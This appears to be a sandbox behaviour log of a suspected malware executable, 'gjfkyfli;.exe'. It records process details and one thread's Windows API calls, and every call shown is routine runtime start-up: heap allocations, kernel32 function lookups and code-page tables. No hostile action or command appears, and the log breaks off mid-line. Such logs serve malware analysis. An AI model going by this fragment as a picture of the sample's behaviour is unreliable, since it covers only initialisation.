# Flog Txt Version 1
# Analyzer Version: 3.1.2
# Analyzer Build Date: Oct 28 2019 11:51:53
# Log Creation Date: 30.10.2019 06:47:23.372

Process:
	id = "1"
	image_name = "gjfkyfli;.exe"
	filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gjfkyfli;.exe"
	page_root = "0x4f3b9000"
	os_pid = "0x934"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "analysis_target"
	parent_id = "0"
	os_parent_pid = "0x0"
	cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gjfkyfli;.exe\" "
	cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "32"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1
	os_tid = 0x938

	[0025.515] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0xf0793bc0, dwHighDateTime=0x1d58eed)) 
	[0025.515] GetCurrentThreadId () returned 0x938
	[0025.515] GetCurrentProcessId () returned 0x934
	[0025.515] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=14543661209) returned 1
	[0025.515] GetStartupInfoW (in: lpStartupInfo=0x18ff08 | out: lpStartupInfo=0x18ff08*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gjfkyfli;.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x7714fd35, hStdError=0x771b7daf)) 
	[0025.515] GetProcessHeap () returned 0x7d60000
	[0025.516] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000
	[0025.516] GetProcAddress (hModule=0x76c20000, lpProcName=0x411d04) returned 0x76c34f2b
	[0025.517] GetProcAddress (hModule=0x76c20000, lpProcName="FlsFree") returned 0x76c3359f
	[0025.517] GetProcAddress (hModule=0x76c20000, lpProcName="FlsGetValue") returned 0x76c31252
	[0025.517] GetProcAddress (hModule=0x76c20000, lpProcName="FlsSetValue") returned 0x76c34208
	[0025.517] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionEx") returned 0x76c34d28
	[0025.517] GetProcAddress (hModule=0x76c20000, lpProcName="CreateEventExW") returned 0x76cb410b
	[0025.517] GetProcAddress (hModule=0x76c20000, lpProcName="CreateSemaphoreExW") returned 0x76cb4195
	[0025.517] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadStackGuarantee") returned 0x76c3d31f
	[0025.517] GetProcAddress (hModule=0x76c20000, lpProcName="CreateThreadpoolTimer") returned 0x76c4ee7e
	[0025.517] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadpoolTimer") returned 0x7717441c
	[0025.517] GetProcAddress (hModule=0x76c20000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7719c50e
	[0025.517] GetProcAddress (hModule=0x76c20000, lpProcName="CloseThreadpoolTimer") returned 0x7719c381
	[0025.517] GetProcAddress (hModule=0x76c20000, lpProcName="CreateThreadpoolWait") returned 0x76c4f088
	[0025.518] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadpoolWait") returned 0x771805d7
	[0025.518] GetProcAddress (hModule=0x76c20000, lpProcName="CloseThreadpoolWait") returned 0x7719ca24
	[0025.518] GetProcAddress (hModule=0x76c20000, lpProcName="FlushProcessWriteBuffers") returned 0x77150b8c
	[0025.518] GetProcAddress (hModule=0x76c20000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7720fde8
	[0025.518] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessorNumber") returned 0x771a1e1d
	[0025.518] GetProcAddress (hModule=0x76c20000, lpProcName="GetLogicalProcessorInformation") returned 0x76cb4761
	[0025.518] GetProcAddress (hModule=0x76c20000, lpProcName="CreateSymbolicLinkW") returned 0x76cacd11
	[0025.518] GetProcAddress (hModule=0x76c20000, lpProcName="SetDefaultDllDirectories") returned 0x0
	[0025.518] GetProcAddress (hModule=0x76c20000, lpProcName="EnumSystemLocalesEx") returned 0x76cb424f
	[0025.518] GetProcAddress (hModule=0x76c20000, lpProcName="CompareStringEx") returned 0x76cb46b1
	[0025.518] GetProcAddress (hModule=0x76c20000, lpProcName="GetDateFormatEx") returned 0x76cc6676
	[0025.518] GetProcAddress (hModule=0x76c20000, lpProcName="GetLocaleInfoEx") returned 0x76cb4751
	[0025.518] GetProcAddress (hModule=0x76c20000, lpProcName="GetTimeFormatEx") returned 0x76cc65f1
	[0025.518] GetProcAddress (hModule=0x76c20000, lpProcName="GetUserDefaultLocaleName") returned 0x76cb47c1
	[0025.518] GetProcAddress (hModule=0x76c20000, lpProcName="IsValidLocaleName") returned 0x76cb47e1
	[0025.519] GetProcAddress (hModule=0x76c20000, lpProcName="LCMapStringEx") returned 0x76cb47f1
	[0025.519] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentPackageId") returned 0x0
	[0025.519] GetProcAddress (hModule=0x76c20000, lpProcName="GetTickCount64") returned 0x76c4eee0
	[0025.519] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileInformationByHandleExW") returned 0x0
	[0025.519] GetProcAddress (hModule=0x76c20000, lpProcName="SetFileInformationByHandleW") returned 0x0
	[0025.519] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x3bc) returned 0x7d71c68
	[0025.519] GetCurrentThreadId () returned 0x938
	[0025.520] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x18) returned 0x7d70770
	[0025.520] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x800) returned 0x7d72030
	[0025.520] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gjfkyfli;.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4054f2, hStdOutput=0x93721d07, hStdError=0x0)) 
	[0025.520] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0
	[0025.520] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0
	[0025.520] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0
	[0025.520] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gjfkyfli;.exe\" "
	[0025.520] GetEnvironmentStringsW () returned 0x7d72838*
	[0025.520] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xaca) returned 0x7d73310
	[0025.520] FreeEnvironmentStringsW (penv=0x7d72838) returned 1
	[0025.520] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4396b0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gjfkyfli;.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gjfkyfli;.exe")) returned 0x33
	[0025.520] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x70) returned 0x7d73de8
	[0025.520] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x98) returned 0x7d73e60
	[0025.520] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x3e) returned 0x7d70790
	[0025.520] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x6c) returned 0x7d73f00
	[0025.520] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x6e) returned 0x7d72838
	[0025.520] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x78) returned 0x7d728b0
	[0025.520] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x62) returned 0x7d73f78
	[0025.520] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x2e) returned 0x7d72930
	[0025.521] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x48) returned 0x7d72968
	[0025.521] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x28) returned 0x7d729b8
	[0025.521] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x1a) returned 0x7d715c0
	[0025.521] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x4a) returned 0x7d729e8
	[0025.521] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x72) returned 0x7d74000
	[0025.521] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x30) returned 0x7d72a40
	[0025.521] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x2e) returned 0x7d72a78
	[0025.521] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x1c) returned 0x7d715e8
	[0025.521] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0xd2) returned 0x7d72ab0
	[0025.521] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x7c) returned 0x7d72b90
	[0025.521] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x36) returned 0x7d72c18
	[0025.521] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x3a) returned 0x7d72c58
	[0025.521] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x90) returned 0x7d72ca0
	[0025.521] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x24) returned 0x7d72d38
	[0025.521] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x30) returned 0x7d72d68
	[0025.521] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x36) returned 0x7d72da0
	[0025.521] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x48) returned 0x7d72de0
	[0025.521] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x52) returned 0x7d72e30
	[0025.521] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x3c) returned 0x7d72e90
	[0025.521] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x82) returned 0x7d72ed8
	[0025.521] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x2e) returned 0x7d72f68
	[0025.521] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x1e) returned 0x7d71610
	[0025.521] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x2c) returned 0x7d72fa0
	[0025.521] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x54) returned 0x7d72fd8
	[0025.521] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x52) returned 0x7d73038
	[0025.521] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x2a) returned 0x7d73098
	[0025.521] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x3c) returned 0x7d730d0
	[0025.521] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x54) returned 0x7d73118
	[0025.521] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x24) returned 0x7d73178
	[0025.521] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x30) returned 0x7d731a8
	[0025.521] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x8c) returned 0x7d731e0
	[0025.521] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7d73310 | out: hHeap=0x7d60000) returned 1
	[0025.522] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x80) returned 0x7d73278
	[0025.522] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1
	[0025.522] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x8, Size=0x800) returned 0x7d73300
	[0025.522] GetLastError () returned 0x0
	[0025.523] SetLastError (dwErrCode=0x0) 
	[0025.523] GetLastError () returned 0x0
	[0025.523] SetLastError (dwErrCode=0x0) 
	[0025.523] GetLastError () returned 0x0
	[0025.523] SetLastError (dwErrCode=0x0) 
	[0025.523] GetACP () returned 0x4e4
	[0025.523] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x220) returned 0x7d73b08
	[0025.523] GetLastError () returned 0x0
	[0025.523] SetLastError (dwErrCode=0x0) 
	[0025.523] IsValidCodePage (CodePage=0x4e4) returned 1
	[0025.523] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1
	[0025.523] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1
	[0025.523] GetLastError () returned 0x0
	[0025.523] SetLastError (dwErrCode=0x0) 
	[0025.523] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0025.523] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256
	[0025.523] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1
	[0025.523] GetLastError () returned 0x0
	[0025.523] SetLastError (dwErrCode=0x0) 
	[0025.523] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0025.523] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256
	[0025.523] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256
	[0025.524] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256
	[0025.524] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x97\x1cr\x93äþ\x18", lpUsedDefaultChar=0x0) returned 256
	[0025.524] GetLastError () returned 0x0
	[0025.524] SetLastError (dwErrCode=0x0) 
	[0025.524] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0025.524] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256
	[0025.524] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256
	[0025.524] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256
	[0025.524] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 